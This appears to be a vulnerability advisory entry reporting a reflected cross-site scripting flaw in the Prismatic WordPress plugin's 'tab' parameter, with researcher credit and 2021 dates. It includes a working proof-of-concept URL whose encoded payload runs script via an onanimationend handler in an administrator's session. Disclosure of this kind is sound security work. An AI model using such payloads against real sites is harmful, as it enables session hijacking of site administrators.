The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
https://example.com/wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert%28origin%29%2F%2F%22
apple502j
apple502j
Yes
2021-06-21 (about 1 years ago)
2021-06-21 (about 1 years ago)
2021-06-25 (about 1 years ago)